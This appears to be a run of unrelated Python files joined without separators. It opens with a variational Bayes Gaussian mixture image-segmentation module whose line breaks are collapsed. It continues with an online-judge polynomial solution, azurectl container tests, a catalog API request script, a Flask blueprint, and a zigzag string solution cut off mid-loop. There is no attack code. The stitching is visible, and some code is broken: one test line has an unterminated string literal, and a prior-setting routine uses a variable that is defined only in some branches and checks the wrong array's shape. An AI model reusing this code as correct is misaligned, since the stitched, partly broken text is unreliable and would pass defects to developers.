ValueError('Degrees of freedom too low for dimensionality.') # Expected log-determinant of precision matrix E = self.multivariate_digamma(n, D) + D*np.log(2) + self.log_det(W) # Entropy H = -self.log_partition_Wishart(W, n) - (n - D - 1)/2 * E + n*D/2 return H def log_det(self, A): """ Numerically stable computation of log determinant of a matrix. Parameters ---------- A : array Expecting a positive definite, symmetric matrix. Returns ------- float Log-determinant of given matrix. 
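Notes
-----
For a symmetric positive definite matrix A with Cholesky factor L
(A = L L^T), det(A) = prod_i L_ii^2, so log det(A) = 2 * sum_i log(L_ii).
Summing the logarithms of the diagonal of L avoids the overflow and
underflow that evaluating det(A) directly can cause.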
""" # Perform cholesky decomposition L = cholesky(A) # Stable log-determinant return np.sum(2*np.log(np.diag(L))) def distW(self, X, S): """ Compute weighted distance. Parameters ---------- X : array Vectors (N by D) or (H by W by D). W : array Weights (D by D). Returns ------- array Weighted distance for each vector. """ if not S.shape[0] == S.shape[1]: raise ValueError('Weight matrix not symmetric.') if not X.shape[-1] == S.shape[0]: raise ValueError('Dimensionality of data and weights mismatch.') if len(X.shape) == 2: # Shapes N, D = X.shape # Preallocate A = np.zeros((N,)) # Loop over samples for n in range(N): # Compute weighted inner product between vectors A[n] = X[n, :] @ S @ X[n, :].T elif len(X.shape) == 3: # Shape H, W, D = X.shape # Preallocate A = np.zeros((H, W)) # Loop over samples for h in range(H): for w in range(W): # Compute weighted inner product between vectors A[h, w] = X[h, w, :] @ S @ X[h, w, :].T return A def one_hot(self, A): """ Map array to pages with binary encodings. Parameters ---------- A : array 2-dimensional array of integers Returns ------- B : array (height by width by number of unique integers in A) 3-dimensional array with each page as an indicator of value in A. """ # Unique values labels = np.unique(A) # Preallocate new array B = np.zeros((*A.shape, len(labels))) # Loop over unique values for i, label in enumerate(labels): B[:, :, i] = (A == label) return B class UnsupervisedGaussianMixture(VariationalMixture): """ Variational Gaussian Mixture Image model. This implementation multivariate images (height by width by channel). It is based on the RPubs note by : https://rpubs.com/cakapourani/variational-bayes-gmm """ def __init__(self, num_channels=1, num_components=2, init_params='nn', max_iter=10, tol=1e-5): """ Model-specific constructors. Parameters ---------- num_channels : int Number of channels of image (def: 1). num_components : int Number of components (def: 2). theta0 : tuple Prior hyperparameters. max_iter : int Maximum number of iterations to run for (def: 10). tol : float Tolerance on change in x-value (def: 1e-5). Returns ------- None """ # Store data dimensionality if num_channels >= 1: self.D = num_channels else: raise ValueError('Number of channels must be larger than 0.') # Store model parameters if num_components >= 2: self.K = num_components else: raise ValueError('Too few components specified') # Optimization parameters self.init_params = init_params self.max_iter = max_iter self.tol = tol # Set prior hyperparameters self.set_prior_hyperparameters(D=num_channels, K=num_components) def set_prior_hyperparameters(self, D, K, a0=np.array([0.1]), b0=np.array([0.1]), n0=np.array([2.0]), m0=np.array([0.0]), W0=np.array([1.0])): """ Set hyperparameters of prior distributions. Default prior hyperparameters are minimally informative symmetric parameters. Parameters ---------- D : int Dimensionality of data. K : int Number of components. a0 : float / array (components by None) Hyperparameters of Dirichlet distribution on component weights. b0 : float / array (components by None) Scale parameters for hypermean normal distribution. n0 : array (components by None) Degrees of freedom for Wishart precision prior. m0 : array (components by dimensions) Hypermeans. W0 : array (dimensions by dimensions by components) Wishart precision parameters. 
Returns ------- theta : tuple """ # Expand alpha's if necessary if not a0.shape[0] == K: a0 = np.tile(a0[0], (K,)) # Expand beta's if necessary if not b0.shape[0] == K: b0 = np.tile(b0[0], (K,)) # Expand nu's if necessary if not n0.shape[0] == K: # Check for sufficient degrees of freedom if n0[0] < D: print('Cannot set Wishart degrees of freedom lower than data \ dimensionality.\n Setting it to data dim.') n0 = np.tile(D, (K,)) else: n0 = np.tile(n0[0], (K,)) # Expand hypermeans if necessary if not np.all(m0.shape == (K, D)): # If mean vector given, replicate to each component if len(m0.shape) == 2: if m0.shape[1] == D: m0 = np.tile(m0, (K, 1)) else: m0 = np.tile(m0[0], (K, D)) # Expand hypermeans if necessary if not np.all(W0.shape == (D, D, K)): # If single covariance matrix given, replicate to each component if len(W0.shape) == 2: if np.all(m0.shape[:2] == (D, D)): W0 = np.tile(W0, (1, 1, K)) else: W0_ = np.zeros((D, D, K)) for k in range(K): W0_[:, :, k] = W0[0]*np.eye(D) # Store tupled parameters as model attribute self.theta0 = (a0, b0, n0, m0, W0_) def initialize_posteriors(self, X): """ Initialize posterior hyperparameters Parameters ---------- X : array Observed image (height by width by channels) Returns ------- theta : tuple Set of parameters. """ # Current shape H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) if self.init_params == 'random': # Dirichlet concentration hyperparameters at = np.ones((self.K,))*(H*W)/2 # Normal precision-scale hyperparameters bt = np.ones((self.K,))*(H*W)/2 # Wishart degrees of freedom nt = np.ones((self.K,))*(H*W)/2 mt = np.zeros((self.K, D)) Wt = np.zeros((D, D, self.K)) for k in range(self.K): # Hypermeans mt[k, :] = np.mean(X, axis=0) + rnd.randn(1, D)*.1 # Hyperprecisions Wt[:, :, k] = np.eye(D) # Initialize variational posterior responsibilities rho = np.ones((H, W, self.K)) / self.K elif self.init_params in ('kmeans', 'k-means'): # Fit k-means to data and obtain cluster assignment label = KMeans(n_clusters=self.K, n_init=1).fit(X).labels_ # Set rho based on cluster labels rho = np.zeros((H*W, self.K)) rho[np.arange(H*W), label] = 1 # Dirichlet concentration hyperparameters at = np.sum(rho, axis=0) # Normal precision-scale hyperparameters bt = np.sum(rho, axis=0) # Wishart degrees of freedom nt = np.sum(rho, axis=0) mt = np.zeros((self.K, D)) Wt = np.zeros((D, D, self.K)) for k in range(self.K): # Hypermeans mt[k, :] = np.sum(rho[:, [k]] * X, axis=0) / np.sum(rho[:, k]) # Hyperprecisions Wt[:, :, k] = np.eye(D) else: raise ValueError('Provided method not recognized.') return (at, bt, nt, mt, Wt), rho def free_energy(self, X, rho, thetat, report=True): """ Compute free energy term to monitor progress. Parameters ---------- X : array Observed image (height by width by channels). rho : array Array of variational parameters (height by width by channels). thetat : array Parameters of variational posteriors. theta0 : array Parameters of variational priors. report : bool Print value of free energy function. Returns ------- rho : array Updated array of variational parameters. 
""" # Shapes H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) rho = rho.reshape((H*W, self.K)) # Unpack parameter sets a0, b0, n0, m0, W0 = self.theta0 at, bt, nt, mt, Wt = thetat # Preallocate terms for energy function E1 = 0 E2 = 0 E3 = 0 E4 = 0 E5 = 0 E6 = 0 E7 = 0 # Loop over classes for k in range(self.K): ''' Convenience variables ''' # Proportion assigned to each component Nk = np.sum(rho[:, k], axis=0) # Responsibility-weighted mean xk = np.sum(rho[:, [k]] * X, axis=0) / Nk # Reponsibility-weighted variance Sk = ((X - xk) * rho[:, [k]]).T @ (X - xk) / Nk # Mahalanobis distance from hypermean mWm = (mt[k, :] - m0[k, :]).T @ Wt[:, :, k] @ (mt[k, :] - m0[k, :]) # Mahalanobis distance from responsibility-weighted mean xWx = (xk - mt[k, :]) @ Wt[:, :, k] @ (xk - mt[k, :]).T # Entropy-based terms Elog_pik = digamma(at[k]) - digamma(np.sum(at)) Elog_Lak = (D*np.log(2) + self.log_det(Wt[:, :, k]) + self.multivariate_digamma(nt[k], D)) ''' Energy function ''' # First term E1 += Nk/2*(Elog_Lak - D / bt[k] - nt[k]*(np.trace(Sk @ Wt[:, :, k]) + xWx) - D*np.log(2*np.pi)) # Second term E2 += np.sum(rho[:, k] * Elog_pik, axis=0) # Third term E3 += (a0[k] - 1)*Elog_pik + (gammaln(np.sum(a0)) - np.sum(gammaln(a0))) / self.K # Fourth term E4 += 1/2*(D*np.log(b0[k] / (2*np.pi)) + Elog_Lak - D*b0[k]/bt[k] - b0[k]*nt[k]*mWm + (n0[k] - D - 1)*Elog_Lak - 2*self.log_partition_Wishart(Wt[:, :, k], nt[k]) + nt[k]*np.trace(inv(W0[:, :, k])*Wt[:, :, k])) # Ignore underflow error from log rho with np.errstate(under='ignore') and np.errstate(divide='ignore'): # Set -inf to most negative number lrho = np.maximum(np.log(rho[:, k]), np.finfo(rho.dtype).min) # Fifth term E5 += np.sum(rho[:, k] * lrho, axis=0) # Sixth term E6 += (at[k] - 1)*Elog_pik + (gammaln(np.sum(at)) - np.sum(gammaln(at))) / self.K # Seventh term E7 += (Elog_Lak/2 + D/2*np.log(bt[k] / (2*np.pi)) - D/2 - self.entropy_Wishart(Wt[:, :, k], nt[k])) # Compute free energy term F = E1 + E2 + E3 + E4 - E5 - E6 - E7 # Print free energy if report: print('Free energy = ' + str(F)) return F def expectation_step(self, X, thetat, savefn=''): """ Perform expectation step. Parameters ---------- X : array Observed image (height by width by channels). thetat : array Current iteration of parameters of variational posteriors. Returns ------- rho : array Updated array of variational parameters / responsibilities. """ # Shape of variational parameter array H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) # Unpack tuple of hyperparameters at, bt, nt, mt, Wt = thetat # Initialize logarithmic rho log_rho = np.zeros((H*W, self.K)) for k in range(self.K): # Compute expected log mixing coefficient E1 = digamma(at[k]) - digamma(np.sum(at)) # Compute exponentiated expected log precision E2 = (D*np.log(2) + self.log_det(Wt[:, :, k]) + self.multivariate_digamma(nt[k], D)) # Compute expected hypermean and hyperprecision E3 = D/bt[k] + self.distW(X - mt[k, :], nt[k]*Wt[:, :, k]) # Update variational parameter at current pixels log_rho[:, k] = E1 + E2/2 - E3/2 # Subtract largest number from log_rho log_rho = log_rho - np.max(log_rho, axis=1)[:, np.newaxis] # Exponentiate and normalize rho = np.exp(log_rho) / np.sum(np.exp(log_rho), axis=1)[:, np.newaxis] # Check for underflow problems if np.any(np.sum(rho, axis=1) == 0.0): raise RuntimeError('Variational parameter underflow.') return rho.reshape((H, W, self.K)) def maximization_step(self, X, rho, thetat): """ Perform maximization step from variational-Bayes-EM. 
Parameters ---------- X : array Observed image (height by width by channels). rho : array Array of variational parameters (height by width by classes). thetat : array Current iteration of hyperparameters of posteriors. Returns ------- thetat : array Next iteration of hyperparameters of posteriors. """ # Shape of image H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) rho = rho.reshape((H*W, self.K)) # Unpack parameter sets a0, b0, n0, m0, W0 = self.theta0 at, bt, nt, mt, Wt = thetat # Iterate over classes for k in range(self.K): # Total responsibility for class k Nk = np.sum(rho[:, k], axis=0) # Responsibility-weighted mean for class k xk = np.sum(rho[:, [k]] * X, axis=0) / Nk # Responsibility-weighted covariance for class k Sk = ((X - xk) * rho[:, [k]]).T @ (X - xk) / Nk # Update alpha at[k] = a0[k] + Nk # Update nu nt[k] = n0[k] + Nk # Update beta bt[k] = b0[k] + Nk # Update hypermean mt[k, :] = (b0[k]*m0[k, :] + Nk*xk) / (b0[k] + Nk) # Update hyperprecision Wt[:, :, k] = inv(inv(W0[:, :, k]) + Nk*Sk + (b0[k]*Nk) / bt[k] * (xk - m0[k, :]).T @ (xk - m0[k, :])) return at, bt, nt, mt, Wt def expectation_maximization(self, X): """ Perform Variational Bayes Expectation-Maximization. Parameters ---------- X : array (instances by features) Data array. Returns ------- rho : array (instances by components) Variational parameters of posterior for label image. """ # Get shape of image H, W, D = X.shape # Initialize posterior hyperparameters thetat, rho = self.initialize_posteriors(X) # Initialize old energy variable F_ = np.inf for t in range(self.max_iter): # Monitor progress every tenth iteration if t % (self.max_iter/10) == 0: # Report progress print('Iteration ' + '{0:03}'.format(t+1) + '/' + str(self.max_iter) + '\t', end='') # Compute free energy to monitor progress F = self.free_energy(X, rho, thetat, report=True) if np.abs(F - F_) <= self.tol: print('Step size is below tolerance threshold.') break # Update old energy F_ = F # Expectation step rho = self.expectation_step(X, thetat, savefn=('rho_t' + str(t))) # Expectation step thetat = self.maximization_step(X, rho, thetat) # Return segmentation along with estimated parameters return rho, thetat def segment(self, X): """ Fit model to data and segment image. Parameters ---------- X : array. Observed image (height by width by channels). Returns ------- pred : array Segmentation produced by the model. post : array Posterior indicator distributions. theta : tuple of arrays Posterior hyperparameters of parameter distributions. """ # Check shape of image H, W, D = X.shape # Check if dimensionality of given data matches prior dimensionality. if not self.D == D: # Report print('Re-setting priors.') # Set dimensionality attribute self.D = D # Set prior hyperparameters self.set_prior_hyperparameters(D=D, K=self.K) # Perform VB-EM for segmenting the image post, params = self.expectation_maximization(X) # Compute most likely class pred = np.argmax(post, axis=2) # Return segmented image, variational posteriors and parameters return pred, post, params class SemisupervisedGaussianMixture(VariationalMixture): """ Variational Gaussian Mixture Image model. This implementation multivariate images (height by width by channel). It is based on the RPubs note by : https://rpubs.com/cakapourani/variational-bayes-gmm """ def __init__(self, num_channels=1, num_components=2, init_params='nn', max_iter=10, tol=1e-5): """ Model-specific constructors. Parameters ---------- num_channels : int Number of channels of image (def: 1). 
num_components : int Number of components (def: 2). theta0 : tuple Prior hyperparameters. max_iter : int Maximum number of iterations to run for (def: 10). tol : float Tolerance on change in x-value (def: 1e-5). Returns ------- None """ # Store data dimensionality if num_channels >= 1: self.D = num_channels else: raise ValueError('Number of channels must be larger than 0.') # Store model parameters if num_components >= 2: self.K = num_components else: raise ValueError('Too few components specified') # Optimization parameters self.init_params = init_params self.max_iter = max_iter self.tol = tol # Set prior hyperparameters self.set_prior_hyperparameters(D=num_channels, K=num_components) def set_prior_hyperparameters(self, D, K, a0=np.array([0.1]), b0=np.array([0.1]), n0=np.array([2.0]), m0=np.array([0.0]), W0=np.array([1.0])): """ Set hyperparameters of prior distributions. Default prior hyperparameters are minimally informative symmetric parameters. Parameters ---------- D : int Dimensionality of data. K : int Number of components. a0 : float / array (components by None) Hyperparameters of Dirichlet distribution on component weights. b0 : float / array (components by None) Scale parameters for hypermean normal distribution. n0 : array (components by None) Degrees of freedom for Wishart precision prior. m0 : array (components by dimensions) Hypermeans. W0 : array (dimensions by dimensions by components) Wishart precision parameters. Returns ------- theta : tuple """ # Expand alpha's if necessary if not a0.shape[0] == K: a0 = np.tile(a0[0], (K,)) # Expand beta's if necessary if not b0.shape[0] == K: b0 = np.tile(b0[0], (K,)) # Expand nu's if necessary if not n0.shape[0] == K: # Check for sufficient degrees of freedom if n0[0] < D: print('Cannot set Wishart degrees of freedom lower than data \ dimensionality.\n Setting it to data dim.') n0 = np.tile(D, (K,)) else: n0 = np.tile(n0[0], (K,)) # Expand hypermeans if necessary if not np.all(m0.shape == (K, D)): # If mean vector given, replicate to each component if len(m0.shape) == 2: if m0.shape[1] == D: m0 = np.tile(m0, (K, 1)) else: m0 = np.tile(m0[0], (K, D)) # Expand hypermeans if necessary if not np.all(W0.shape == (D, D, K)): # If single covariance matrix given, replicate to each component if len(W0.shape) == 2: if np.all(m0.shape[:2] == (D, D)): W0 = np.tile(W0, (1, 1, K)) else: W0_ = np.zeros((D, D, K)) for k in range(K): W0_[:, :, k] = W0[0]*np.eye(D) # Store tupled parameters as model attribute self.theta0 = (a0, b0, n0, m0, W0_) def initialize_posteriors(self, X, Y): """ Initialize posterior hyperparameters Parameters ---------- X : array Observed image (height by width by channels) Returns ------- theta : tuple Set of parameters. 
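Notes
-----
With init_params='nn', unlabelled pixels receive their initial
responsibilities from a 1-nearest-neighbour classifier fitted on the
labelled pixels, while labelled pixels keep their observed hard labels;
'random' and 'kmeans' behave as in the unsupervised model.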
""" # Current shape H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) Y = Y.reshape((H*W, self.K)) # Observation indicator vector O = np.any(Y == 1, axis=1) if self.init_params == 'random': # Dirichlet concentration hyperparameters at = np.ones((self.K,))*(H*W)/2 # Normal precision-scale hyperparameters bt = np.ones((self.K,))*(H*W)/2 # Wishart degrees of freedom nt = np.ones((self.K,))*(H*W)/2 mt = np.zeros((self.K, D)) Wt = np.zeros((D, D, self.K)) for k in range(self.K): # Hypermeans mt[k, :] = np.mean(X, axis=0) + rnd.randn(1, D)*.1 # Hyperprecisions Wt[:, :, k] = np.eye(D) # Initialize variational posterior responsibilities rho = np.ones((H, W, self.K)) / self.K elif self.init_params in ('kmeans', 'k-means'): # Fit k-means to data and obtain cluster assignment label = KMeans(n_clusters=self.K, n_init=1).fit(X).labels_ # Set rho based on cluster labels rho = np.zeros((H*W, self.K)) rho[np.arange(H*W), label] = 1 # Dirichlet concentration hyperparameters at = np.sum(rho, axis=0) # Normal precision-scale hyperparameters bt = np.sum(rho, axis=0) # Wishart degrees of freedom nt = np.sum(rho, axis=0) mt = np.zeros((self.K, D)) Wt = np.zeros((D, D, self.K)) for k in range(self.K): # Hypermeans mt[k, :] = np.sum(rho[:, [k]] * X, axis=0) / np.sum(rho[:, k]) # Hyperprecisions Wt[:, :, k] = np.eye(D) # Reshape responsibilities rho = rho.reshape((H, W, self.K)) elif self.init_params in ('nn', 'knn'): # Observation indicator vector O = np.any(Y == 1, axis=1) if np.sum(O) == 0.0: raise ValueError('Cannot use \'nn\' without labels.') # Call instance of k-nearest neighbour classifier kNN = KNeighborsClassifier(n_neighbors=1, weights='distance') # Fit classifier to labeled data kNN.fit(X[O, :], np.argmax(Y[O, :], axis=1)) # Set responsibilities based on kNN prediction rho = np.zeros((H*W, self.K)) rho[~O, :] = kNN.predict_proba(X[~O, :]) rho[O, :] = Y[O, :].astype('float64') # Concentration hyperparameters at = np.sum(rho, axis=0) # Precision-scale hyperparameters bt = np.sum(rho, axis=0) # Wishart degrees of freedom nt = np.sum(rho, axis=0) mt = np.zeros((self.K, D)) Wt = np.zeros((D, D, self.K)) for k in range(self.K): # Hypermean mt[k, :] = np.mean(X[Y[:, k] == 1, :], axis=0) # Hyperprecisions Wt[:, :, k] = np.eye(D) # Reshape responsibilities rho = rho.reshape((H, W, self.K)) else: raise ValueError('Provided method not recognized.') return (at, bt, nt, mt, Wt), rho def free_energy(self, X, rho, thetat, report=True): """ Compute free energy term to monitor progress. Parameters ---------- X : array Observed image (height by width by channels). rho : array Array of variational parameters (height by width by channels). thetat : array Parameters of variational posteriors. theta0 : array Parameters of variational priors. report : bool Print value of free energy function. Returns ------- rho : array Updated array of variational parameters. 
""" # Shapes H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) rho = rho.reshape((H*W, self.K)) # Unpack parameter sets a0, b0, n0, m0, W0 = self.theta0 at, bt, nt, mt, Wt = thetat # Preallocate terms for energy function E1 = 0 E2 = 0 E3 = 0 E4 = 0 E5 = 0 E6 = 0 E7 = 0 # Loop over classes for k in range(self.K): ''' Convenience variables ''' # Proportion assigned to each component Nk = np.sum(rho[:, k], axis=0) # Responsibility-weighted mean xk = np.sum(rho[:, [k]] * X, axis=0) / Nk # Reponsibility-weighted variance Sk = ((X - xk) * rho[:, [k]]).T @ (X - xk) / Nk # Mahalanobis distance from hypermean mWm = (mt[k, :] - m0[k, :]).T @ Wt[:, :, k] @ (mt[k, :] - m0[k, :]) # Mahalanobis distance from responsibility-weighted mean xWx = (xk - mt[k, :]) @ Wt[:, :, k] @ (xk - mt[k, :]).T # Entropy-based terms Elog_pik = digamma(at[k]) - digamma(np.sum(at)) Elog_Lak = (D*np.log(2) + self.log_det(Wt[:, :, k]) + self.multivariate_digamma(nt[k], D)) ''' Energy function ''' # First term E1 += Nk/2*(Elog_Lak - D / bt[k] - nt[k]*(np.trace(Sk @ Wt[:, :, k]) + xWx) - D*np.log(2*np.pi)) # Second term E2 += np.sum(rho[:, k] * Elog_pik, axis=0) # Third term E3 += (a0[k] - 1)*Elog_pik + (gammaln(np.sum(a0)) - np.sum(gammaln(a0))) / self.K # Fourth term E4 += 1/2*(D*np.log(b0[k] / (2*np.pi)) + Elog_Lak - D*b0[k]/bt[k] - b0[k]*nt[k]*mWm + (n0[k] - D - 1)*Elog_Lak - 2*self.log_partition_Wishart(Wt[:, :, k], nt[k]) + nt[k]*np.trace(inv(W0[:, :, k])*Wt[:, :, k])) # Ignore underflow error from log rho with np.errstate(under='ignore') and np.errstate(divide='ignore'): # Set -inf to most negative number lrho = np.maximum(np.log(rho[:, k]), np.finfo(rho.dtype).min) # Fifth term E5 += np.sum(rho[:, k] * lrho, axis=0) # Sixth term E6 += (at[k] - 1)*Elog_pik + (gammaln(np.sum(at)) - np.sum(gammaln(at))) / self.K # Seventh term E7 += (Elog_Lak/2 + D/2*np.log(bt[k] / (2*np.pi)) - D/2 - self.entropy_Wishart(Wt[:, :, k], nt[k])) # Compute free energy term F = E1 + E2 + E3 + E4 - E5 - E6 - E7 # Print free energy if report: print('Free energy = ' + str(F)) return F def expectation_step(self, X, Y, rho, thetat): """ Perform expectation step. Parameters ---------- X : array Observed image (height by width by channels). thetat : array Current iteration of parameters of variational posteriors. Returns ------- rho : array Updated array of variational parameters / responsibilities. """ # Shape of variational parameter array H, W, D = X.shape # Observation indicator vector M = np.all(~Y, axis=2) # Unpack tuple of hyperparameters at, bt, nt, mt, Wt = thetat # Initialize logarithmic rho lrho = np.zeros((H, W, self.K), dtype='float64') for k in range(self.K): # Compute expected log mixing coefficient E1 = digamma(at[k]) - digamma(np.sum(at)) # Compute exponentiated expected log precision E2 = (D*np.log(2) + self.log_det(Wt[:, :, k]) + self.multivariate_digamma(nt[k], D)) # Compute expected hypermean and hyperprecision E3 = D/bt[k] + self.distW(X - mt[k, :], nt[k]*Wt[:, :, k]) # Update variational parameter at current pixels lrho[:, :, k] = E1 + E2/2 - E3/2 # Subtract largest number from log_rho lrho[M, :] = lrho[M, :] - np.max(lrho[M, :], axis=1)[:, np.newaxis] # Exponentiate and normalize rho[M, :] = (np.exp(lrho[M, :]) / np.sum(np.exp(lrho[M, :]), axis=1)[:, np.newaxis]) # Check for underflow problems if np.any(np.abs(np.sum(rho, axis=2) - 1.0) > 1e-12): raise RuntimeError('Variational parameter underflow.') return rho def maximization_step(self, X, rho, thetat): """ Perform maximization step from variational-Bayes-EM. 
Parameters ---------- X : array Observed image (height by width by channels). rho : array Array of variational parameters (height by width by classes). thetat : array Current iteration of hyperparameters of posteriors. Returns ------- thetat : array Next iteration of hyperparameters of posteriors. """ # Shape of image H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) rho = rho.reshape((H*W, self.K)) # Unpack parameter sets a0, b0, n0, m0, W0 = self.theta0 at, bt, nt, mt, Wt = thetat # Iterate over classes for k in range(self.K): # Total responsibility for class k Nk = np.sum(rho[:, k], axis=0) # Responsibility-weighted mean for class k xk = np.sum(rho[:, [k]] * X, axis=0) / Nk # Responsibility-weighted covariance for class k Sk = ((X - xk) * rho[:, [k]]).T @ (X - xk) / Nk # Update alpha at[k] = a0[k] + Nk # Update nu nt[k] = n0[k] + Nk # Update beta bt[k] = b0[k] + Nk # Update hypermean mt[k, :] = (b0[k]*m0[k, :] + Nk*xk) / (b0[k] + Nk) # Update hyperprecision Wt[:, :, k] = inv(inv(W0[:, :, k]) + Nk*Sk + (b0[k]*Nk) / bt[k] * (xk - m0[k, :]).T @ (xk - m0[k, :])) return at, bt, nt, mt, Wt def expectation_maximization(self, X, Y): """ Perform Variational Bayes Expectation-Maximization. Parameters ---------- X : array (instances by features) Data array. Y : array Observed labels (height by width by classes). Returns ------- rho : array (instances by components) Variational parameters of posterior for label image. """ # Get shape of image H, W, D = X.shape # Initialize posterior hyperparameters thetat, rho = self.initialize_posteriors(X, Y) # Initialize old energy variable F_ = np.inf for t in range(self.max_iter): # Monitor progress every tenth iteration if t % (self.max_iter/10) == 0: # Report progress print('Iteration ' + '{0:03}'.format(t+1) + '/' + str(self.max_iter) + '\t', end='') # Compute free energy to monitor progress F = self.free_energy(X, rho, thetat, report=True) if np.abs(F - F_) <= self.tol: print('Step size is below tolerance threshold.') break # Update old energy F_ = F # Expectation step rho = self.expectation_step(X, Y, rho, thetat) # Expectation step thetat = self.maximization_step(X, rho, thetat) # Return segmentation along with estimated parameters return rho, thetat def segment(self, X, Y): """ Fit model to data and segment image. Parameters ---------- X : array. Observed image (height by width by channels). Y : array Observed labels (height by width by classes). Returns ------- pred : array Segmentation produced by the model. post : array Posterior indicator distributions. theta : tuple of arrays Posterior hyperparameters of parameter distributions. """ # Check shape of image H, W, D = X.shape # Check if dimensionality of given data matches prior dimensionality. 
if not self.D == D: # Report print('Re-setting priors.') # Set dimensionality attribute self.D = D # Set prior hyperparameters self.set_prior_hyperparameters(D=D, K=self.K) # Perform VB-EM for segmenting the image post, params = self.expectation_maximization(X, Y) # Compute most likely class pred = np.argmax(post, axis=2) # Return segmented image, variational posteriors and parameters return pred, post, params sladewinter/UVa-Online-Judge0 #UVa - 498 - Polly the Polynomial #Polynomial while(True): try: coef = input().split() val = input().split() n = len(coef) st = '' for v in val: sum = 0 for i in range(n): sum += int(coef[i]) * pow(int(v), n - 1 - i); st += str(sum) + ' ' print(st[:-1]) except EOFError: breakfrom .test_helper import argv_kiwi_tests import datetime import sys import mock from mock import patch from urllib.parse import urlparse from pytest import raises from azurectl.storage.container import Container import azurectl from collections import namedtuple from azurectl.azurectl_exceptions import ( AzureCannotInit, AzureContainerCreateError, AzureContainerDeleteError, AzureContainerListContentError, AzureContainerListError ) MOCK_STORAGE_NAME = 'mock-storage' class TestContainer: def setup(self): name = namedtuple("name", "name") self.name_list = [name(name="a"), name(name="b")] account = mock.Mock() credentials = namedtuple( 'credentials', ['private_key', 'certificate', 'subscription_id'] ) account.storage_name = mock.Mock(return_value=MOCK_STORAGE_NAME) account.storage_key = mock.Mock( return_value='' + ' ) account.publishsettings = mock.Mock( return_value=credentials( private_key='abc', certificate='abc', subscription_id='4711' ) ) self.container = Container(account) def test_container_alternate_init(self): container = Container( account_name=self.container.account_name, key=self.container.account_key, blob_service_host_base=self.container.blob_service_host_base ) assert container.account_name == self.container.account_name assert container.account_key == self.container.account_key assert container.blob_service_host_base == \ self.container.blob_service_host_base def test_container_failed_init(self): with raises(AzureCannotInit): Container() @patch('azurectl.storage.container.BaseBlobService.list_containers') def test_list(self, mock_list_containers): mock_list_containers.return_value = self.name_list assert self.container.list() == ['a', 'b'] @patch('azurectl.storage.container.BaseBlobService.delete_container') def test_delete(self, mock_delete): assert self.container.delete('container_name') is True mock_delete.assert_called_once_with( container_name='container_name', fail_not_exist=True ) @patch('azurectl.storage.container.BaseBlobService.create_container') def test_create(self, mock_create): assert self.container.create('container_name') is True mock_create.assert_called_once_with( container_name='container_name', fail_on_exist=True ) @patch('azurectl.storage.container.BaseBlobService.delete_container') def test_delete_raises(self, mock_delete): mock_delete.side_effect = Exception with raises(AzureContainerDeleteError): self.container.delete('container_name') @patch('azurectl.storage.container.BaseBlobService.create_container') def test_create_raises(self, mock_create): mock_create.side_effect = Exception with raises(AzureContainerCreateError): self.container.create('container_name') @patch('azurectl.storage.container.BaseBlobService.list_containers') def test_list_raises(self, mock_list_containers): mock_list_containers.side_effect = AzureContainerListError with 
raises(AzureContainerListError): self.container.list() @patch('azurectl.storage.container.BaseBlobService.list_blobs') def test_content(self, mock_list_blobs): mock_list_blobs.return_value = self.name_list assert self.container.content('some-container') == \ {'some-container': ['a', 'b']} @patch('azurectl.storage.container.BaseBlobService.list_blobs') def test_content_raises(self, mock_list_blobs): mock_list_blobs.side_effect = AzureContainerListContentError with raises(AzureContainerListContentError): self.container.content('some-container') def test_sas(self): container = 'mock-container' start = datetime.datetime(2015, 1, 1) expiry = datetime.datetime(2015, 12, 31) permissions = 'rl' parsed = urlparse( self.container.sas(container, start, expiry, permissions) ) assert parsed.scheme == 'https' assert parsed.netloc == MOCK_STORAGE_NAME + \ '.blob.core.windows.net' assert parsed.path == '/' + container assert 'st=2015-01-01T00%3A00%3A00Z' in parsed.query assert 'se=2015-12-31T00%3A00%3A00Z' in parsed.query assert 'sp=rl' in parsed.query assert 'sr=c' in parsed.query assert 'sig=' in parsed.query # can't actively validate the signature @patch('azurectl.storage.container.BaseBlobService.get_container_properties') def test_exists_false(self, mock_properties): mock_properties.side_effect = Exception assert self.container.exists('container_name') is False @patch('azurectl.storage.container.BaseBlobService.get_container_properties') def test_exists_true(self, mock_properties): assert self.container.exists('container_name') is True #------------------------------------------------------------------------------ # Get the status of the dominant colors index. # GET /v1/catalog/{catalog_name}/dominant_colors_index #------------------------------------------------------------------------------ import os import json import requests from urlparse import urljoin from pprint import pprint from props import * # Replace this with the custom url generated for you. api_gateway_url = props['api_gateway_url'] # Pass the api key into the header # Replace 'your_api_key' with your API key. headers = {'X-Api-Key': props['X-Api-Key']} # Catalog name. 
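# A minimal sketch of the entries this script expects in props.py
# (placeholder values, not real credentials):
#
#     props = {
#         'api_gateway_url': 'https://your-api-gateway-url/',
#         'X-Api-Key': 'your_api_key',
#         'catalog_name': 'your_catalog',
#     }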
catalog_name = props['catalog_name']

api_endpoint = '/v1/catalog/%s/dominant_colors_index' % (catalog_name)

url = urljoin(api_gateway_url, api_endpoint)

response = requests.get(url, headers=headers)

print(response.status_code)
pprint(response.json())
514840279/danyuan-application-cloud
#!/usr/bin/python3
import json
from flask import Response, Blueprint
from flask import request
from controller.service.StartService import StartService

# Define the module using a Blueprint.
start = Blueprint(name='start', import_name="start",
                  static_folder='./static', template_folder='./templates')


@start.route("/run", methods=['POST'])
def run():
    params = request.json
    result = {"code": 1}
    startService = StartService()
    for item in params['list']:
        startService.run(item)
    return Response(json.dumps(result), mimetype='application/json')  # send the data back as JSON


class Solution:
    def XXX(self, s: str, numRows: int) -> str:
        # Handle the special cases first.
        if numRows == 1 or len(s) <= numRows:
            return s
        n, i, flag, reverse, res_dic = len(s), 0, 0, 1, {}
        """
        Set a threshold and walk the indices in zigzag order. For example,
        with numRows=3 and s="technology", flag (the corresponding row index)
        takes the values:
        0 1 2 1 0 1 2 1 0 1
        t e c h n o l o g y
        """
        threshold = numRows - 1
        while i < n:
            # Concatenate characters that share the same row number.
            if flag not in res_dic:
                res_dic[flag] = s[i]
            else:
                res_dic[flag] += s[i]
            # When flag equals the threshold it starts decreasing;
            # when flag equals 0 it starts increasing again.
            if flag == 0:
                reverse = 1
            if flag == threshold:
                reverse = 0
            if reverse == 1:
                flag += 1
